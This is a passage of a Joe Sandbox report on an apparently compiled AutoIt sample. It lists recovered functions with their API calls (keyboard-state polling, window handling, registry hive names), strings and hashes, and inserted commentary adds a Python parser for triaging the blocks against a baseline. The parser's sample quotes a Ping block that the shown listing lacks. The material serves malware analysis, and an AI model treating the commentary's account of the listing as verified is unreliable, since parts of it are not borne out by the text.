                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 3964851224-909552448
                                    • Opcode ID: 71aa95beaebe5647e6a98262b0712eed6ffb9d21395ee4a2cd1aa414ee4841be
                                    • Instruction ID: 14cc9bbb6ed4b681a40d98aa9e51f4cca52cf2367ea32d2080db2757ce55347b
                                    • Opcode Fuzzy Hash: 71aa95beaebe5647e6a98262b0712eed6ffb9d21395ee4a2cd1aa414ee4841be
                                    • Instruction Fuzzy Hash: 6E41753050028A8BDF14EF51D991AEF33A5FF22344F504454FC652B2A6EB70EE0ACB50
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001A36F4,00000010,?,Bad directive syntax error,001CDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 001725D6
                                    • LoadStringW.USER32(00000000,?,001A36F4,00000010), ref: 001725DD
                                    • _wprintf.LIBCMT ref: 00172610
                                    • __swprintf.LIBCMT ref: 00172632
                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001726A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                    • API String ID: 1080873982-4153970271
                                    • Opcode ID: 05a56d72b4b0fbe5a1d2654e8d9dff6517c6da7ffe729c43c6c299c0d27da1ef
                                    • Instruction ID: db6e4190c7d89584746aef76898d085e8435dc4313be1770b2ce0b55c091efdc
                                    • Opcode Fuzzy Hash: 05a56d72b4b0fbe5a1d2654e8d9dff6517c6da7ffe729c43c6c299c0d27da1ef
                                    • Instruction Fuzzy Hash: EA21303180021AFFCF15AF90CC4AFEE7B79BF28704F044465F915660A2EB71A659DB51
                                    APIs
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00177B42
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00177B58
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00177B69
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00177B7B
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00177B8C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: SendString
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 890592661-1007645807
                                    • Opcode ID: ce97566c3f7abda778d31eccad27873663c757771a620acabfc070a5f75e1016
                                    • Instruction ID: c2f8c5182d51195c09100ceb11c1b32af08adc51e1eade34fcf957fa5c34ca46
                                    • Opcode Fuzzy Hash: ce97566c3f7abda778d31eccad27873663c757771a620acabfc070a5f75e1016
                                    • Instruction Fuzzy Hash: 9F1182A1A9029979D724A7A2DC4ADFF7ABCEBA1B10F0005197425A30D1EB601A45C6A0
                                    APIs
                                    • timeGetTime.WINMM ref: 00177794
                                      • Part of subcall function 0014DC38: timeGetTime.WINMM(?,76C1B400,001A58AB), ref: 0014DC3C
                                    • Sleep.KERNEL32(0000000A), ref: 001777C0
                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 001777E4
                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00177806
                                    • SetActiveWindow.USER32 ref: 00177825
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00177833
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00177852
                                    • Sleep.KERNEL32(000000FA), ref: 0017785D
                                    • IsWindow.USER32 ref: 00177869
                                    • EndDialog.USER32(00000000), ref: 0017787A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: 0ff3b4e6bb1cdd7e263ffeb0e9ad1d4219cdcdc53fcecc5ad64f13769dbe8c79
                                    • Instruction ID: 8598042727994cc5352a3706ee2b040ae24ff58afbfd895b843f51f1a69c11a3
                                    • Opcode Fuzzy Hash: 0ff3b4e6bb1cdd7e263ffeb0e9ad1d4219cdcdc53fcecc5ad64f13769dbe8c79
                                    • Instruction Fuzzy Hash: BC213BB0244205AFE7199B60FC8DA367F79FB44348F018124F52E829A2EB719D81DA21
                                    APIs
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • CoInitialize.OLE32(00000000), ref: 0018034B
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001803DE
                                    • SHGetDesktopFolder.SHELL32(?), ref: 001803F2
                                    • CoCreateInstance.COMBASE(001BDA8C,00000000,00000001,001E3CF8,?), ref: 0018043E
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001804AD
                                    • CoTaskMemFree.COMBASE(?), ref: 00180505
                                    • _memset.LIBCMT ref: 00180542
                                    • SHBrowseForFolderW.SHELL32(?), ref: 0018057E
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001805A1
                                    • CoTaskMemFree.COMBASE(00000000), ref: 001805A8
                                    • CoTaskMemFree.COMBASE(00000000), ref: 001805DF
                                    • CoUninitialize.COMBASE ref: 001805E1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                    • String ID:
                                    • API String ID: 1246142700-0
                                    • Opcode ID: 21280a0f74e20161266033d104ad68b5a35f5b0f63ae1bce5d0e12eb3d63c0cd
                                    • Instruction ID: 4f89489c22b8f29e3a723b956d237c069f77205b2fe3360a05ad93a0f786acb0
                                    • Opcode Fuzzy Hash: 21280a0f74e20161266033d104ad68b5a35f5b0f63ae1bce5d0e12eb3d63c0cd
                                    • Instruction Fuzzy Hash: 6BB1C775A00109AFDB05DFA4D889DAEBBB9FF48314B148469F805EB251DB70EE45CF50
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 00172ED6
                                    • SetKeyboardState.USER32(?), ref: 00172F41
                                    • GetAsyncKeyState.USER32(000000A0), ref: 00172F61
                                    • GetKeyState.USER32(000000A0), ref: 00172F78
                                    • GetAsyncKeyState.USER32(000000A1), ref: 00172FA7
                                    • GetKeyState.USER32(000000A1), ref: 00172FB8
                                    • GetAsyncKeyState.USER32(00000011), ref: 00172FE4
                                    • GetKeyState.USER32(00000011), ref: 00172FF2
                                    • GetAsyncKeyState.USER32(00000012), ref: 0017301B
                                    • GetKeyState.USER32(00000012), ref: 00173029
                                    • GetAsyncKeyState.USER32(0000005B), ref: 00173052
                                    • GetKeyState.USER32(0000005B), ref: 00173060
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: 7b1e642e858b6595db2dd91abb14d9ac79674d90ec79dfab98091eb937e17c77
                                    • Instruction ID: 3d6a0e137ceedc7ab13731357d7c01f94fc7fee9eeff3d36449c09d7e831d677
                                    • Opcode Fuzzy Hash: 7b1e642e858b6595db2dd91abb14d9ac79674d90ec79dfab98091eb937e17c77
                                    • Instruction Fuzzy Hash: 8051C760A0479829FB35EBA48811BEABFB45F11340F08C59DD5CA571C2DF64AB8DCB62
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 0016ED1E
                                    • GetWindowRect.USER32(00000000,?), ref: 0016ED30
                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0016ED8E
                                    • GetDlgItem.USER32(?,00000002), ref: 0016ED99
                                    • GetWindowRect.USER32(00000000,?), ref: 0016EDAB
                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0016EE01
                                    • GetDlgItem.USER32(?,000003E9), ref: 0016EE0F
                                    • GetWindowRect.USER32(00000000,?), ref: 0016EE20
                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0016EE63
                                    • GetDlgItem.USER32(?,000003EA), ref: 0016EE71
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0016EE8E
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0016EE9B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: 31f508ae855be50355b0b110cecb33bb2e8fdffa82e0a1f9a8f9251a0cf70780
                                    • Instruction ID: d3151e8d58babd9ee59132510438a3215d658a235b20713732398329c78a842c
                                    • Opcode Fuzzy Hash: 31f508ae855be50355b0b110cecb33bb2e8fdffa82e0a1f9a8f9251a0cf70780
                                    • Instruction Fuzzy Hash: 5D512275B00205AFDB18CFA9DD95AAEBBFAFB88700F14822DF519D7290E7719D448B10
                                    APIs
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    • GetSysColor.USER32(0000000F), ref: 0014B438
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: 7f9bae572af1f5875191117fd9569478a5b8fc060a52fad913529e1a8576a8b8
                                    • Instruction ID: 450799b901c40a9ffc02c8bc0152efc76d9ddd7398ee1bc183509c65418014eb
                                    • Opcode Fuzzy Hash: 7f9bae572af1f5875191117fd9569478a5b8fc060a52fad913529e1a8576a8b8
                                    • Instruction Fuzzy Hash: 5541AF34008544AFDB285F28E8C9BB93B66AB06731F184761FD668E5F6D730CD82DB21
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                    • String ID:
                                    • API String ID: 136442275-0
                                    • Opcode ID: 560ac3744111ef991b24a552cd1b949b42e57f877fc57a99b2087390bb91a490
                                    • Instruction ID: b3185ea96ab00b7a61fee32a407b7c0fda2c1adca6e7c13911eed756f5595895
                                    • Opcode Fuzzy Hash: 560ac3744111ef991b24a552cd1b949b42e57f877fc57a99b2087390bb91a490
                                    • Instruction Fuzzy Hash: 81410C7684511CAECF62EB94CC45DDE73BCEB58310F0041E6BA69A6051EB70ABE98F50
                                    APIs
                                    • CharLowerBuffW.USER32(001CDC00,001CDC00,001CDC00), ref: 0017D7CE
                                    • GetDriveTypeW.KERNEL32(?,001E3A70,00000061), ref: 0017D898
                                    • _wcscpy.LIBCMT ref: 0017D8C2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharDriveLowerType_wcscpy
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2820617543-1000479233
                                    • Opcode ID: b43ffb063aab08e33e9a13779ebaad1ced2f39b9f66e06ebefd3a8927da2e5d8
                                    • Instruction ID: 60102d075cfa191258a6d14cc7450a493db6a4d0aa214c0bb0fab650c3c433a3
                                    • Opcode Fuzzy Hash: b43ffb063aab08e33e9a13779ebaad1ced2f39b9f66e06ebefd3a8927da2e5d8
                                    • Instruction Fuzzy Hash: 7F519031504244AFC704EF14E881A6EB7B5EFA4314F60C92DF9AE672A2DB31DD45CB42
                                    APIs
                                    • __swprintf.LIBCMT ref: 001393AB
                                    • __itow.LIBCMT ref: 001393DF
                                      • Part of subcall function 00151557: _xtow@16.LIBCMT ref: 00151578
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __itow__swprintf_xtow@16
                                    • String ID: %.15g$0x%p$False$True
                                    • API String ID: 1502193981-2263619337
                                    • Opcode ID: 84b94bc4cdafc59a790a1f26fd5b3e211ca21ce8ac1eb7a68096ad1dfd466278
                                    • Instruction ID: 79cdbd94747a7887d57b6290feb78bb8b66f47c0cdbf8f7504e9ad3c9a539685
                                    • Opcode Fuzzy Hash: 84b94bc4cdafc59a790a1f26fd5b3e211ca21ce8ac1eb7a68096ad1dfd466278
                                    • Instruction Fuzzy Hash: 2A412675504204EBDB28EF74D942EAA77E4FF89310F20446EE45ED72C1EBB19901CB51
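                                     The blocks in this listing are Joe Sandbox's per-function decomposition of the sample's main image (base 0x130000): each one records the Win32/CRT calls the function makes, the strings it references (joined with `$` in the String ID field), and content hashes (Opcode ID, Instruction ID, fuzzy hashes). The API/string pairings seen here (GetDriveTypeW with cdrom/fixed/network/ramdisk/removable, IcmpSendEcho with "Ping", GetDiskFreeSpaceW with NOTREADY/READONLY/READY, the FOR..IN and "Failed to create object" messages) read as the AutoIt runtime's own built-ins, consistent with the report's "Binary is likely a compiled AutoIt script file" signature, so the triage question is which recovered functions are interpreter code and which are worth an analyst's time. The parser below is an added example written for this page; it is not Joe Sandbox code or output. It parses this block format (stripping the "Download File" button label the HTML export glues onto file names), collects the API calls, referenced strings and Opcode ID per function, and splits functions by whether their Opcode ID appears in a baseline set. `parse_blocks`, `triage` and the record types are names chosen here; `SAMPLE` is a trimmed excerpt of the listing above, and `BASELINE` is constructed for the demo on the assumption that, in practice, it would be produced by running a clean interpreter build through the same pipeline.

```python
"""Parse the per-function blocks of a Joe Sandbox listing into records and
separate functions whose Opcode ID matches a baseline from the rest."""
import re
from dataclasses import dataclass, field

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# "IcmpSendEcho.IPHLPAPI(?,?,00000005), ref: 00188237" or, with no argument
# list, "GetLastError.KERNEL32 ref: 0017E416"; CRT names may contain $ @ ?.
API_RE = re.compile(r"^(?P<name>\S+?)\.(?P<module>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str               # call-site address inside the dumped image
    via_subcall: str = ""  # intermediate function address for "Part of subcall"

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)      # Similarity / Source fields
    associated: list = field(default_factory=list)  # other dump regions

    @property
    def opcode_id(self):
        return self.fields.get("Opcode ID", "")

    def strings(self):
        # the report joins the strings a function references with "$"
        return [s for s in self.fields.get("String ID", "").split("$") if s]

def _clean(raw):
    line = raw.strip()
    if line.endswith("Download File"):   # HTML export glues the button label on
        line = line[:-len("Download File")].rstrip()
    return line[1:].strip() if line.startswith("•") else line

def parse_blocks(text):
    blocks, current, section = [], None, None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":            # every function block opens with APIs
                current = FunctionBlock()
                blocks.append(current)
            section = line
            continue
        if current is None:               # listing that starts mid-block
            current = FunctionBlock()
            blocks.append(current)
        if section == "APIs":
            via, m = "", SUBCALL_RE.match(line)
            if m:
                via, line = m.group("fn"), m.group("rest")
            if m := API_RE.match(line):
                args = [a for a in (m.group("args") or "").split(",") if a]
                current.apis.append(ApiCall(m.group("name"), m.group("module"),
                                            args, m.group("ref"), via))
        elif m := FIELD_RE.match(line):
            if m.group("key") == "Associated":
                current.associated.append(m.group("val"))
            else:
                current.fields[m.group("key")] = m.group("val")
    return blocks

def triage(blocks, baseline_opcode_ids):
    """Opcode IDs present in the baseline (assumed: a clean interpreter build run
    through the same pipeline) are known code; the remainder is left for review."""
    known = [b for b in blocks if b.opcode_id in baseline_opcode_ids]
    unknown = [b for b in blocks if b.opcode_id not in baseline_opcode_ids]
    return known, unknown

# Trimmed excerpt of two blocks from the listing above, including the glued
# "Download File" label exactly as the export renders it.
SAMPLE = """\
APIs
• WSAStartup.WS2_32(00000101,?), ref: 00188168
• IcmpCreateFile.IPHLPAPI ref: 001881C7
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00188237
Memory Dump Source
• Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• String ID: Ping
• Opcode ID: 0ef4a09757f249a4cbec7be456c56d122a67e46ba892502a1aac4790e50fe2c6
APIs
• __swprintf.LIBCMT ref: 001393AB
  • Part of subcall function 00151557: _xtow@16.LIBCMT ref: 00151578
Similarity
• String ID: %.15g$0x%p$False$True
• Opcode ID: 84b94bc4cdafc59a790a1f26fd5b3e211ca21ce8ac1eb7a68096ad1dfd466278
"""
# Constructed for the demo: pretend only the Ping block is already known.
BASELINE = {"0ef4a09757f249a4cbec7be456c56d122a67e46ba892502a1aac4790e50fe2c6"}
```

                                     Run on the full exported listing, `triage(parse_blocks(text), baseline)[1]` leaves only the functions whose Opcode ID did not occur in the baseline build, and `FunctionBlock.strings()` plus the `module`/`name` pairs of its `apis` give a quick summary of what each of those does before opening the dump in a disassembler.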
                                    APIs
                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0019A259
                                    • CreateCompatibleDC.GDI32(00000000), ref: 0019A260
                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0019A273
                                    • SelectObject.GDI32(00000000,00000000), ref: 0019A27B
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0019A286
                                    • DeleteDC.GDI32(00000000), ref: 0019A28F
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0019A299
                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0019A2AD
                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0019A2B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                    • String ID: static
                                    • API String ID: 2559357485-2160076837
                                    • Opcode ID: c306941addae7d16a911bca5901df2858d628b11712eadf228eb637597a99d90
                                    • Instruction ID: e3b39247c4dccdf651c2298bae27c6c685a52d566757230a28584adb5fea5b6b
                                    • Opcode Fuzzy Hash: c306941addae7d16a911bca5901df2858d628b11712eadf228eb637597a99d90
